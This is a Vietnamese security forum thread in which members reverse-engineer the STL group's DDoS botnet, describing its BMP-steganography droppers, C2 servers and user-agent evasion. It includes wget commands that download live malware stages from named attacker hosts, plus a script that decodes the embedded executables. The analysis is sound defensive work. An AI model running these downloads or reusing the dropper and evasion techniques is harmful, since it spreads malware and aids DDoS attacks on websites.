Kính bác, em ko ngờ bác lại viết ... dài đến thế. Hehe, quan điểm của em đơn giản lắm, có thể gọi là mũ ni che tai cũng được, nhưng thực dụng và không làm gì tốn công vô ích. Em theo đạo Phật nửa mùa và hiểu 1 số điều: có nhân và có quả. Gieo gió ắt gặt bão. Từ lâu em đã quan niệm XH Internet là 1 kiểu tương tác của XH loài người, sẽ có người tốt, người xấu và đó là 2 cái thiện ác đấu tranh cùng tồn tại như Phật đã dạy. Như thế đi chửi XH nó đầy người xấu cũng như lên Internet chửi bọn xấu thôi, vô ích, tốn nước bọt. XH phải có người xấu và phải có như thế mới tồn tại XH. Và hơn nữa, trong 1 người có thể tồn tại cả 2 hình thái thiện/ác, tốt/xấu lẫn lộn đó. Người chửi STL tưởng là mình làm việc tốt nhưng cái xấu chính là việc "chửi", ngược lại STL làm nhiều chuyện xằng bậy trên Internet nhưng chắc họ cũng có mặt tốt nào đó mà chúng ta ko biết. Dù sao em cũng vẫn theo sát topic của bạn TQN, xem xem có gì mới trong kỹ thuật của STL để mà học hỏi. Kiến thích này có ích nha, áp dụng nó vào công việc => giảm nguy cơ bảo mật => thu lợi (vì người ta đang thuê mình bảo vệ công việc kinh doanh - ko phải bảo vệ chính trị đâu nha). Em nghĩ các bạn kỹ thuật nên tập trung vào kỹ thuật để học hỏi hơn là phán xét chửi rủa. P/S: chú thích thêm tí đại ý của em là lên Internet là phải chấp nhận một môi trường không an toàn, luật lệ lỏng lẻo, đầy DDOS, đầy rẫy virus hay lắm kẻ nhòm ngó. Sống chung với lũ và biết cách chế ngự nó, đề phòng, tránh nó hơn là ngồi đó than vãn, quy chụp người Việt thế này, yêu nước thế kia...

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

bonus thêm cái pic các bác nhìn xem nó ở đâu

Phân tích tính chất vài trận DDoS HVA vừa qua.

kutruoi — GMT

em thấy quan trọng nhất vẫn là RC mã malware bọn này rồi nhanh chóng thông bao cho các AV để họ cập nhật và diệt đám botnet này. việc hôm nay chúng đặt ở một vài host bên tàu, mai chúng đặt bên nga, ngày kia chúng đặt bên đức các file giao lệnh thì cũng là chuyện đương nhiên. bọn này chắc kô ngu đến nỗi đặt các files nhiệm vụ đó ở các server việt nam. cho nên iem nghĩ việc forensic theo dấu vết các domains rồi mang máng quy kết là đám stl là liên quan đến hacker tàu khựa .v.v. là nghe chừng chưa convinced cho lắm. việc liên lạc hoạc down những server chứa các fai tác nghiệp kia cũng rất quan trọng, nhưng kết luận là có sự tham gia của bọn tàu , bọn tây là kô ổn. em mạo muội tự suy diễn là stl là đám việt nam đang muốn loại bỏ HVA vì lý do thương mại và thương hiệu mà thôi. :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

TQN wrote:

Tới ngày hôm nay, 16-08-2011, host map.priper.info không còn trả về flower.bmp và aqua.bmp nữa, nginx trả về "404 Not Found". Kiểm tra trên robtex.com, thấy có điều lạ là host: E9tn.com lại có cùng IP với map.priper.info. Cái này thì em không hiểu, các bác rành về network giải thích giùm em. ...................................

Website-webserver map.priper.info sử dụng IP tĩnh là 208.115.200.206, đặt tại Dalas, TX, USA Hostname (resolved) là 206-200-115-208.static.reverse.lstn.net. Webserver này hiện chỉ hosting 1 website là map.priper.info. Chú y vào lúc này webserver chỉ mở cổng 8080 TCP (Nghĩa là web server NGINX version 1.10 đươc config. tai cổng nói trên) Còn E9tn.com sử dụng IP tĩnh 184.22.201.232, webserver cũng đặt tại USA. Hiện webserver inactive (offline). Ngoài E9tn.com, còn có khoảng 8 đến 9 website khác cũng hosting trên webserver này, như mantean-enfants.com, pp3x.info... Người (hay tổ chức) sở hữu domain E9tn.com đúng là "DAHAI HUANG". Ngoài domai này "DAHAI HUANG" còn quản lý khoảng 3939 domain khác.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Chào anh PXMMRF, Botnet của stl sử dụng một file chứa một đống User-Agents và hiệu lệnh để tấn công. Zombies có thể được gán random User-Agents hoặc một User-Agent cố định nào đó. Botnet của stl không tuân thủ các ấn định chung cho "crawler" thông thường. Chúng không hề thăm dò "robots.txt" mà chỉ đập thẳng vô các URI nào đó và từ đó tiếp tục crawl sâu vô trong. Bởi vậy mới tạo tác hại lớn. Với bots của stl, cho dù các zombies có check "robots.txt", việc áp dụng ACAP cũng không có tác dụng gì cả bởi vì zombies sử dụng low-level socket API để tạo requests đến mục tiêu. Ở level này, những ấn định và ứng dụng có trên trình duyệt hẳn hòi (như IE, FF, Chrome....) hoặc ở các crawlers thật thụ đều không có ý nghĩa đối với zombies stl. @ TQN: thật ra các websites và blogs bị stl "dán bùa" lên thì ít nhất 70% là của người Việt trong nước chớ chẳng phải của người Việt ở nước ngoài. Ở Việt Nam, từ năm 2007 đã có những bài báo có tiêu đề "An ninh mạng và pháp lý sẽ được củng cố" và từ đó tới giờ đã hơn 4 năm, vẫn chưa thấy củng cố gì hết. Việt Nam vẫn chưa có một cái khung pháp lý cụ thể về an ninh mạng và cách xử lý với những vi phạm. @ myquartz:

Người chửi STL tưởng là mình làm việc tốt nhưng cái xấu chính là việc "chửi", ngược lại STL làm nhiều chuyện xằng bậy trên Internet nhưng chắc họ cũng có mặt tốt nào đó mà chúng ta ko biết.

Chuyện "mặt tốt" của stl thế nào "chúng ta ko biết" nhưng lại cố lôi cái "không biết" đó ra để bào chữa, trong khi những chuyện "xằng bậy" kia bị chửi thì cho là hành động chửi là xấu? Bạn lý luận đầy nguỵ biện và không có nền tảng tí nào. Làm sao bạn có thể dựa vào những "cái tốt" mơ hồ nào đó để làm đối trọng với "cái xấu" (hành động chửi) ở đây? Việc bạn cảm thấy chủ đề này ích lợi về mặt kỹ thuật, đó là chuyện của bạn nhưng bạn không nên vin vào lý do kỹ thuật để phê phán những phát biểu về mặt đạo đức. Chừng nào bạn có thể chứng minh được những việc làm "tốt" của stl thì lúc ấy, bạn có thể dùng nó để phê phán việc "chửi". Tôi không hề "ngồi than vãn" mà tôi đã và đang làm những việc thực tế. Tôi không quy chụp ai bất cứ điều gì và tôi chưa hề đề cập hai chữ "yêu nước" gì ở đây hết. Chính bạn mới là kẻ quy chụp, hiểu sai và bóp méo vấn đề.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Đây là một tổ chức nằm trong "bóng tối", được "bảo kê", và chúng ta dù biết chúng là ai thì chỉ dựa vào kết quả RE, forensics... thì cũng không đủ chứng cứ hay tìm ra đích danh tên tuổi ngoài đời của chúng đầy đủ được. Hơn nữa, nếu chúng ta "bạch hoá" chúng, không khéo chúng ta còn bị lên đâu đó ngồi viết tường trình, làm khó làm dể, lục soát, điều tra... nữa thì khổ lắm :-(

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

DDOS phòng rất khó, nếu mạng botnet mô phỏng đúng các behaviors của người lướt web thì site bị tấn công chỉ còn cách chịu trận mà thôi. (ngay cả HVA cũng thế, trừ khi anh lọc IP hoặc close website). Như anh conmale đề cập bài trên, thì STL chọc vào 1 page rồi từ page đó sẽ có các link tới pages khác của site hiện tại, crawl tiếp vào các links này...mức độ thiệt hại của website sẽ càng nặng nề hơn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Gởi mấy anh stl đoạn script này đọc chơi cho đỡ buồn: Code:

//------------------------------------------------------------------------------------------------
//--- 010 Editor v3.2 Script File
//
// File: DecodeBin.1sc
// Author: ThangCuAnh (TQN) 
// Revision: 1.1
// Purpose: Decode and extract the embedded PE files in decoded files from plxzyin0fx.bmp,
// BlueSphere.bmp, aqua.bmp
//------------------------------------------------------------------------------------------------
char Mask[] = "ï¾ÞNullsoftInst '";
char strBin[255];

int i, j, iFiles, curFile, newFile;
int64 liPos, fSize;

// Check that a file is open
if (FileCount() == 0)
{
    MessageBox(idOk, "DecodeBin", "DecodeBin can only be executed when a file is loaded.");
    return -1;
}

// Save the file index of current file
curFile = GetFileNum();

// Find the embedded PE files
liPos = FindFirst(Mask);
if (liPos < 0)
{
    MessageBox(idOk, "DecodeBin", "Could not find the mask of embedded PE files");
    return -1;
}

liPos += 20;
iFiles = ReadInt(liPos);
liPos += sizeof(int);

Printf("Number of embedded PE files %d - Start at 0x%LX", iFiles, liPos);

for (i = 0; i < iFiles; ++i)
{
    fSize = ReadInt(liPos);
    liPos += sizeof(int);
    SetSelection(liPos, fSize);
    CopyToClipboard();

    newFile = FileNew();
    FileSelect(newFile);    // force select new file
    PasteFromClipboard();

    // Decode the new file
    for (j = 0; j < FileSize(); ++j)
    {
        // Modify the current byte
        WriteUByte(j, ReadUByte(j) ^ (( j & 3) + 0x4D));
    }
    SPrintf(strBin, "File%d.bin", i + 1);
    strBin = InputSaveFileName("Save decoded PE as", "All files (*.*)", strBin, ".bin");
    FileSave(strBin);

    // Switch to old file
    FileSelect(curFile);

    // Seek to next embedded PE file
    liPos += fSize;
}

Hiên tại chỉ có speed.cyline.org:443 của mấy anh là còn hoạt động, nhả về flower.bmp và plxzyin0fx.bmp. Còn cái map.priper.info thì mấy anh tạm dừng nó làm chi vậy, chỉ giáo cho em biết với -:|-

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tiếp tục nào anh em, chúng ta sẽ đi download, decode và extract, phân tích các .exe, .dll files từ file mạo danh bmp, dùng kỹ thuật che giấu thông tin trong ảnh bmp của stl. Post lên để anh em cùng tham gia theo dõi và phân tích các biến thể mới của các con bot nằm vùng của stl. Đầu tiên, làm cái gì cũng phải có tool, làm bằng tay thì không được đâu: 1. Wget: link download tui đã post, anh em chịu khó down về, để dành xài luôn. Không có nó cũng được, dùng ngay brower hiện tại vẫn down được các file .bmp của stl. 2. 1 trình HexEditor: Em thì vẫn khoái nhất là 010 Editor và FileInsight. 010 Editor support mọi thứ mà WinHex, HexWorkshop có. Hơn nữa, nó có tính năng template parser và script rất mạnh. Vì vậy em dùng thằng này là chính. Anh em có thể lên http://www.exelab.ru down về, hay download bản em đang dùng từ http://www.mediafire.com/?f2zvdmjabph1dwg Các software, tool nho nhỏ mà em đang dùng thì đa số đều được em make thành portable, chả cần install gì cả. Cứ chép vào thư mục nào đó, chỉnh sữa file .reg theo đường dẫn mới, đăng ký nó là xong. Ngoài ra, IDA Pro v6.1 và OllyDbg cũng cần, nhưng chắc các bạn đã có các tool này. Không có cũng không sao. Các tool và scrip để decode file của stl em đã post tại đây: http://www.mediafire.com/?5g7r7c8eme0wjp2 Như chúng ta đã biết, thằng nằm vùng download bmp file về và decode, extract ra bot nằm vùng của stl là hai ông nội đáng ghét: uxtheme.manifest và themeui.manifest. Hai ông nội giả danh này sẽ liên tục download các file bmp từ map.priper.info:8080 và speed.cyline.org:443. Chúng ta sẽ không dùng 2 file manifest này để download mà dùng chính wget hay brower ta đang dùng để download các file bmp này về để phân tích. File uxtheme.manifest sẽ download flower.bmp từ 1 trong 2 host trên về. File flower.bmp chỉ chứa thông tin về một file bmp lớn hơn, che giấu các con downloader nằm vùng trong đó. Các con downloader này sẽ tiếp tục download con bot về. Do map.priper.info đã ngưng hoạt động, web server Nginx của nó cứ trả về not found, nên ta sẽ tập trung trên speed.cyline.org, port 443. Đầu tiên, wget file bmp về cái đã: Code:

wget "http://speed.cyline.org:443/flower.bmp?g={1CD70F27-EA66-4812-834C-FB39AE2DC170}&c=1&v=1&tf=312218282815&tr=312218282861&t=312218282864&p=2&e=0&n=ThangChaMayTuiSTL&u=OngNoiMayNe&lfhbbnwdbywxlineyegfswjxylrktvvfjqlr=vznmbfhxpgocvojqhosgdbenhrjtnglagonsvca"

Chú ý: nếu ta chỉ wget http://speed.cyline.org:443/flower.bmp không thì chúng ta vẫn được flower.bmp, nhưng flower.bmp có một số thông tin khác với flower.bmp lấy theo URL trên. Nhưng không quan trong. Các thông tin đó gồm size, Checksum, flag, tính hợp lệ... mà stl coder quy định trong các file flower.bmp. Tuỳ theo URL mà Nginx sẽ trả về file nào. Nhưng mấy anh stl ơi, khác mấy field đó thì quan trọng gì, cái em cần là size và URL để download cái bmp lớn kìa :-) Tiếp tục, chúng ta đã có cái file flower.bmp với cái name dài ngoằng (vì em lười không quy định thông số output file name cho wget), nên ta cứ rename lại thành flower.bmp. Tiếp theo, chúng ta sẽ dùng tool DecodeBmp.exe để decode thông tin che giấu trong file bmp này:

Mở file flower.bin với 010 Editor, chúng ta sẽ thấy link để download file bmp lớn, size, tên .tmp file để download về:

Để ý nhé các bạn, size = 24 6A 04 00 tức = 0x00046A24, = 289316. Đây chính là size của file EXE nhúng trong larger bmp, trong trường hợp hiện nay là plxzyin0fx.bmp. Tiếp tục download plxzyin0fx.bmp: Code:

wget http://speed.cyline.org:443/plxzyin0fx.bmp?dl=1&oyeerpsaahqumkthxeswvwlfdxpizmffsfk=njhkmdjqlnkwmrofymzmxgqf

Ta được file plxzyin0fx.bmp với cái đuôi dài loằng ngoằng. Rename thành plxzyin0fx.bmp. Chú ý, nếu ta: wget http://speed.cyline.org:443/plxzyin0fx.bmp thì vẫn được file plxzyin0fx.bmp y như trên, không khác 1 tý gì (dùng fc.exe của Windows để compare). Đây là một bug của stl coder cho Nginx webserver.

Về trình compare, tui đang dùng Araxis Merge và WinMerge. Các bạn có thể dùng bất kỳ trình file compare nào cũng được, fc.exe là tiện ích có sẵn của Windows, nằm trong System32.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

conmale wrote:

Chào anh PXMMRF, Botnet của stl sử dụng một file chứa một đống User-Agents và hiệu lệnh để tấn công. Zombies có thể được gán random User-Agents hoặc một User-Agent cố định nào đó. Botnet của stl không tuân thủ các ấn định chung cho "crawler" thông thường. Chúng không hề thăm dò "robots.txt" mà chỉ đập thẳng vô các URI nào đó và từ đó tiếp tục crawl sâu vô trong. Bởi vậy mới tạo tác hại lớn. Với bots của stl, cho dù các zombies có check "robots.txt", việc áp dụng ACAP cũng không có tác dụng gì cả bởi vì zombies sử dụng low-level socket API để tạo requests đến mục tiêu. Ở level này, những ấn định và ứng dụng có trên trình duyệt hẳn hòi (như IE, FF, Chrome....) hoặc ở các crawlers thật thụ đều không có ý nghĩa đối với zombies stl. @ TQN: thật ra các websites và blogs bị stl "dán bùa" lên thì ít nhất 70% là của người Việt trong nước chớ chẳng phải của người Việt ở nước ngoài. Ở Việt Nam, từ năm 2007 đã có những bài báo có tiêu đề "An ninh mạng và pháp lý sẽ được củng cố" và từ đó tới giờ đã hơn 4 năm, vẫn chưa thấy củng cố gì hết. Việt Nam vẫn chưa có một cái khung pháp lý cụ thể về an ninh mạng và cách xử lý với những vi phạm. .................................................................................

Cám ơn bài viết làm rõ vấn đề của anh conmale File liệt kê các User Agents đươc bot mới (ta còn chưa biết) của STL sử dụng để update User Agent chắc cũng tương tự (tương tự thôi) như file User_Agent.txt trong Malzilla. (Khi cài Malzilla trên các OS Windows server , như Win 2K3 thì việc lưa chọn User Agent theo ý người sử dụng soft. mới thưc hiện được. Còn cài Malzilla trên các OS khác như Win XP thì dường như tiện ích này không thưc hiện được) Tuy nhiên, theo tôi cho dù STL virus-trojan có một file User Agent.txt như nói ở trên, thì nó vẫn phải có một tool hay codes để change user agent string default trong các trình duyệt IE, FF.... Vì nếu không customize (tức là change) User agent string trong IE, FF thì các trình duyệt này vẫn gửi các gói tin DDoS đên mục tiêu với User Agent string măc định của trình duyệt, thí dụ: Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0 Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0 ............ Trên nền Windows, tool nói trên,nếu có, chắc phải thưc hiện các bước công việc trình tư đại thể như sau: Command Prompt---->GPEDIT.MSC -->User Configuration -> Windows Settings -> Internet Explorer Maintenance -> Connection--->User Agent String--->Customize string --->insert new User Agent string (chọn cố định hay chọn random một User Agent string trong file "User Agent.txt" nói trên)-->OK

texudo wrote:

Như anh conmale đề cập bài trên, thì STL chọc vào 1 page rồi từ page đó sẽ có các link tới pages khác của site hiện tại, crawl tiếp vào các links này...mức độ thiệt hại của website sẽ càng nặng nề hơn.

Các header trong các gói tin của STL DDoS đến muc tiêu như vừa qua thì không thể nào tạo nên hiệu quả crawling các link hiện hiện trên URL bị DDoS vào. Muốn crawling thì phải có thêm những command cần thiết kèm với header.

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

Các header trong các gói tin của STL DDoS đến muc tiêu như vừa qua thì không thể nào tạo nên hiệu quả crawling các link hiện hiện trên URL bị DDoS vào. Muốn crawling thì phải có thêm những command cần thiết kèm với header. "

Theo em hiểu thì mục đích thay đổi User Agents là để Server host website tạo một thread mới. Vì với một user khi dùng một browser để request tới Server thì họ sẽ chỉ có một User Agent duy nhất mà thôi. Việc STL thay đổi nhiều User Agents mục đích là để làm "LỤT" Server với quá nhiều thread được sinh ra....Không biết em hiểu có đúng không?

Như anh conmale đề cập bài trên, thì STL chọc vào 1 page rồi từ page đó sẽ có các link tới pages khác của site hiện tại, crawl tiếp vào các links này...mức độ thiệt hại của website sẽ càng nặng nề hơn.

-> Ý em là crawler khi craw vào một page nào đó, nó sẽ dectect luôn các INTERNAL Urls của site đó và tiếp tục crawl vào các INTERNAL Urls. Còn việc thay đổi User Agents thì chắc là sẽ tạo thêm hiểu quả rồi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tiếp tục nào anh em, vừa gõ, vừa capture hình, vừa upload mệt quá. Các file BlueSphere.bmp, aqua.bmp, plxzyin0fx.bmp, flower.bmp đều dùng chung một thuật toán che giấu thông tin trong ảnh bmp (tiếng Anh là stegoxxx gì đó tự nhiên em quên mất tiêu rồi), nên ta tiếp tục dùng tool DecodeBmp.exe (của ông nội ThangCuAnh viết đó =))) để decode file plxzyin0fx.bmp ra file EXE. Code:

DecodeBmp.exe plxzyin0fx.bmp plxzyin0fx.bin

Được file plxzyin0fx.bin rồi, chúng ta dùng các trình, plugin Overlay cho PE file của PEiD hay 010Editor (hay HexEditor nào cũng được) để set size của file plxzyin0fx.bin về size mà tui đã post. File plxzyin0fx.bin này là file EXE, trong ruột nó nhúng nhiều file EXE và DLL khác. Khi uxtheme.manifest, themeui.manifest download file larger bmp này về (plxzyin0fx.bmp, aqua.bmp) về, nó sẽ decode trên memory, write xuống .tmp file đã chỉ ra, CreateProcess file temp đó. File temp (plxzyin0fx.bin, aqua.bin) sẽ tiếp tục extract ra TeamViewer.exe, hay TeamViewer_Desktop.exe, uxtheme.manifest hay themeui.manifest. Hai ông nội manifest này sẽ tiếp tục download bot mới cũng mạo danh bmp từ host khác về và execute tương tự như các bước trên: cũng download bmp file, extract data từ bmp, write xuống temp file, CreateProcess temp file đó....

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

@Anh PXMMRF: Bot của STL sử dụng các browser có sẵn trên máy để DDOS hở a ?

Các header trong các gói tin của STL DDoS đến muc tiêu như vừa qua thì không thể nào tạo nên hiệu quả crawling các link hiện hiện trên URL bị DDoS vào. Muốn crawling thì phải có thêm những command cần thiết kèm với header.

Theo em nghĩ, crawl cũng chỉ là 1 quá trình duyệt 1 website, parse nội dung HTML của trang đó, và lấy hết những href link trong trang, rồi tiếp tục request đến các href link đó thôi mà ? @texudo: Hình như việc thay đổi User-Agent không liên quan đến việc server tạo ra thread khác đâu bạn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

texudo wrote:

Các header trong các gói tin của STL DDoS đến muc tiêu như vừa qua thì không thể nào tạo nên hiệu quả crawling các link hiện hiện trên URL bị DDoS vào. Muốn crawling thì phải có thêm những command cần thiết kèm với header. "
Theo em hiểu thì mục đích thay đổi User Agents là để Server host website tạo một thread mới. Vì với một user khi dùng một browser để request tới Server thì họ sẽ chỉ có một User Agent duy nhất mà thôi. Việc STL thay đổi nhiều User Agents mục đích là để làm "LỤT" Server với quá nhiều thread được sinh ra....Không biết em hiểu có đúng không?
Như anh conmale đề cập bài trên, thì STL chọc vào 1 page rồi từ page đó sẽ có các link tới pages khác của site hiện tại, crawl tiếp vào các links này...mức độ thiệt hại của website sẽ càng nặng nề hơn.
-> Ý em là crawler khi craw vào một page nào đó, nó sẽ dectect luôn các INTERNAL Urls của site đó và tiếp tục crawl vào các INTERNAL Urls. Còn việc thay đổi User Agents thì chắc là sẽ tạo thêm hiểu quả rồi.

Thật ra, mục đích thay đổi User-Agent (bằng cách sử dụng hàng loạt các User-Agent thông thường) là để qua mặt những hệ thống cản lọc nhằm mục đích tạo càng nhiều requests vào hệ thống của nạn nhân càng tốt. Càng nhiều requests thì càng nhiều process (hoặc threads, tuỳ mô hình) và càng tạo load, càng hao tổn tài nguyên. Nếu hệ thống không đủ tài nguyên để đáp ứng thì nó chết. DDoS thành công. Về chuyện crawl thì nó tạo tác hại hơn là đấm vô 1 URL nhất định rồi. Bởi vì nếu đấm vô 1 URL liên tục thì dễ bị nhận ra là "đồ phá hoại" và bị block bằng cách này hoặc cách khác nhưng nếu access nhiều URL (xuyên qua crawling) thì khó bị hệ thống bảo vệ phát hiện hơn. Kèm theo sự thay đổi của User-Agent, nó càng làm cho việc phát hiện khó khăn hơn. Tuy nhiên, cái gì cũng có hai mặt của nó. Protocol đưa ra lúc nào cũng có giới hạn, điểm mạnh và điểm yếu. Những hành động thật sự do con người tạo ra luôn luôn có những đặc thù mà không có bot nào có thể tạo ra được. May là quy luật tự nhiên có những thứ khiến cho cái ác và cái tà không thể đi đến chỗ cùng cực được.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

Như chúng ta đã thấy qua quá trình RCE của anh TQN, STL có khá nhiều webserver,, trên 10 webserver, chuyên dùng làm master-webserver,, chỉ huy và điều khiển các cuộc tân công DDoS vào các trang mang VN. Nạn nhân mới đây chính là HVA. Nạn nhân mới nhất là Vietnamnet.net. Hôm nay trên báo SGGP, Vietnamnet đã xác nhân thông tin website này bị DDoS. Việc bị DDoS đã làm cho website này luôn bị quá tải. Việc truy cập đến các trang của website khá chậm, đăc biệt là các trang đăng tải các hình ảnh. Tuy có nhiều master webserver như vây, nhưng thưc tế gần đây STL chỉ sử dung thường xuyên một số master website-webserver. Chúng là: - second.dinest.net - map.priper.info - speed.cyline.org - net.iadze.com - một, hai website-webserver khác STL thường chuyển nhiệm vụ thường trực chỉ huy điều khiển mang bot (in-charge) từ webserver này sang webserver khác, nhằm làm chúng ta bối rối trong việc theo dõi. Ngoài ra chúng còn thay đổi cổng truy cập, thí dụ từ 80 TCP sang 8080 TCP hoăc sang 443 TCP HTTPS.... Gần đây STL cũng đã dời webserver second.dinest.net từ một địa chỉ IP tĩnh cũ sang một đia chỉ IP tĩnh mới, để đánh lạc hướng người theo dõi. Các webserver nói trên hầu hết hay tất cả chỉ hosting (đặt) một website duy nhất làm nhiệm vụ master webserver cho mang bot. Các webserver nói trên đa phần là các dedicated server (server thuê riêng), chỉ một hai cái có thể là virtual server ( Hai hay vài virtural server cùng trên một máy chủ). Để theo dõi, điều chỉnh, bảo dưỡng, giải quyết các trục trăc về KT và hành chính từ xa (remote management) tất cà các master webserver nói trên thường xuyên, hàng giờ thì chắc chắn STL phải cần ít nhất là từ 3-4 người có trình độ KT khá và tương đối thông thao ngoai ngữ (English). Thông thao đươc hiểu là trao đổi đươc qua phone, khi khẩn cấp và qua email. Chứ không phải là người có trình độ tiêng Anh ngớ ngẩn như một thành viên non nớt của STL viết một câu tiếng Anh dớ dẩn như vừa qua. Ai đã từng đặt một webserver ở nước ngoài đều biết rõ và trải nghiệm điều này. Chi phí thuê nhiều webserver đặt ở nước ngoài như STL đang làm, không hề nhỏ chút nào. Ai đã thuê dedicated server nước ngoài cũng biết rõ điều này. Các chi phí phụ, cần cho webserver hoạt động ổn định thường lai khá cao. Để làm được rất nhiều việc như ta đã thấy hiện nay (không chỉ theo dõi quản lý các webserver, mà còn nhiều việc khác, như viết, sưu tầm các mã virus, trojan, tổ chưc và thưc hiện việc gây nhiễm hàng trăm ngàn máy zombies ở VN và nước ngoài với virus tạo ra, theo dõi hiệu quả của quá trình....) STL cần nhiều nhân lực. STL cũng còn phải có một nhóm chuyên đọc, theo dõi nôi dung và các bài viết trên rất nhiều website, blog trên mạng, để quyết định hay xin chỉ thị cấp trên là đánh (DDoS hay khui thông tin cá nhân nói xấu người chủ trì trang mạng) ai? Đánh như thế nào (đánh cảnh cáo- có thể như với vietnamnet.net, hay đánh cho sụp hẳn -như với HVA)? Đánh thật hay đánh giả? (Đánh giả để che giấu mục đích thật, sâu xa của STL)..... Các bạn thử đoán xem cần bao nhiêu người để làm cho đạt yêu cầu (của cấp trên) việc này?. Nếu ai đó nói về một vài công việc khác mà có thể STL đang làm, chúng ta có thể phải kinh ngạc về khôi lương công việc họ phải làm và thán phục về ý tưởng sâu xa, thâm hiểm của họ. Tôi nghĩ rằng STL là một tổ chức khá chặt chẽ, với biên chế hàng chục người, có thể lên đến 40-50 người, kể cả cấp trên trực tiếp. Tất nhiên STL gồm nhiều thành phần trong đó có vài bạn nhỏ VN biết ít nhiều về virus, nhưng dại dột trong cuộc sống. Nhưng cũng có những những người có trình độ khá, hay rất khá về virus, IT hoặc có những ý tưởng độc đáo, thông minh. Vì vậy không nên đánh giá STL quá thấp, như một số bạn đã viết. Cũng không nên đánh giá quá cao, để sợ. Quay trở lai các master webser-website của STL, tôi upload lên đây một số hình ảnh. Qua đó các bạn sẽ biết nhiều thông tin về chúng, trong đó có các vị trí đia lý đặt các webserver này

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Cơ chế hoạt động, kỷ thuật DDOS mà AcrobatUpdarer.exe và SbieMgm.dll dùng thì tui xin mạn phép post sau (khi nào tui nổi hứng hay siêng :-( ), giờ tiếp tục quay lại mấy cái stegoxxx bmp giấu PE files đã. Kỹ thuật che giấu, nhúng PE files của STL có tới 3 kỹ thuật mà tui biết tới bây giờ, nói chung là lạ và hay: giấu trong BMP file mà ta đang tìm hiểu, giấu trong Resource và zip luôn file PE đó và nhúng trực tiếp vào .data section của EXE. Kỹ thuật extract PE files từ file BMP hơi dài dòng, các bạn có thể hỏi riêng hay PM cho tui, code để extract thì các bạn tham khảo trong DecodeBmp.cpp mà tui đã up lên mediafire, file DecodeSTLVirus. Bà con làm theo được không ? Có gì "théc mét", góp ý, chê bai gì cứ post lên nhé, cứ "phang" em thẳng tay, không sao cả. Em biết post hình mệt nhưng có hình cho nó sống động, dể đọc, dể theo dõi hơn, phải không anh em ! Mở file plxzyin0fx.bin trong 010 Editor, chúng ta thấy ngay thằng này là PE file. Set size = size đã nêu trong flower.bin:

Kiểm tra với PEiD, LordPE, PE Explorer:

File EXE mà mấy anh stl coder build với reloc mode làm chi cho nó bự ra vậy mấy anh stl, không biết .reloc section là gì à ? Theo hình trên, bà con thấy đó, plxzyin0fx.bin là file .exe, có overlay data với size là 0x33824, position = 0x13200. Mở plxzyin0fx.bin với 010 Editor tiếp, xem cái overlay data đó là gì:

Các bạn chú ý cái hex string và dòng text giả danh NullsoftInst đó nhé. Đây chính là điểm bắt đầu cho việc xác định và extract các PE files được nhúng trong plxzyin0fx.bin này. Và 0x13200 chính là điểm bắt đầu của Overlay data.

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Hôm nay em qua nhà thằng cháu vào 1 website bên lề trái thấy bị thông báo như sau

Có phải máy tính của thằng ku cháu nhà em đã bị nhiễm Malware của STL hay không ? E reset lại modem thì vào lại bình thường có lẽ google ghi nhận cái địa chỉ ip của thằng ku cháu trong cache nên mới có thông báo như vậy. Em quên mất lỡ tay ghost lại máy tính cho nó.. em sẽ theo dõi thêm tình hình

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tiếp tục, chúng ta sẽ xác định xem code nào của stl làm nhiệm vụ extract cái overlay data này: Bình thường, khi IDA, tui đi từ hàm địa chỉ cao tới địa chỉ thấp, nhưng file plxzyin0fx.bin này nhỏ, hàm stl viết chỉ có mấy hàm, nên tui nhảy ngay vào hàm đầu tiên: 0x00401000, bắt đầu của code section .text. Và chính hàm này là hàm tìm chuỗi NullsoftInst để xác định nơi bắt đầu extract PE file.

Các bạn thấy đấy, stl coder đã cố che dấu chuỗi NullsoftInst trong code bằng cách chèn từng byte 0x5F vào giữa từng byte trong chuỗi hex EF BE AD DE 4E 75 6C 6C 73 6F 66 74 49 6E 73 74 20 27 02 00. Trong hàm Find_Embedded_PE_Pos, biến đếm j sẽ += 2 thay vì += 1 để skip các byte 0x5F này. Hàm Decode từng embedded PE file rất đơn giản, chỉ là:

Tóm lại, ta đã có thể viết 010 Editor script để tự động extract và decode các embedded PE files trong plxzyin0fx.bin. Script đó tui vừ post lên. Chỉ cần mở file plxzyin0fx.bin trong 010 Editor, kéo script đó vào 010 Edtior, swich lại tab plxzyin0fx.bin, run script thì ta sẽ có 3 file File1.bin, File2.bin và File3.bin. Các bạn thử IDA hay OllyDbg plxzyin0fx.bin, các bạn sẽ thấy File1.bin chính là TeamViewer_Desktop.exe, File2.bin là themeui.manifest, File3.bin không được extract ra và là file rỗng. Thật ra themeui.manifest và uxtheme.manifest cùng là 1, cùng chỉ có 1 code duy nhất, nhưng build ra khi thì scrun.dll, khi thì ClientDll.dll (stl coder rename thôi), chỉ export ra 1 hàm GetThemeUI duy nhất. TeamViewer_xxx.exe sẽ LoadLibrary uxtheme.manifest hay themeui.manifest rồi GetProcAddress, call hàm export GetThemeUI này.

Có gì thắc mắc, trao đổi, chê bai, các anh em cứ mạnh dạn post lên nhé ! Các anh stl cũng vậy, em RCE vậy được chưa mấy anh :-/

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

lequi wrote:

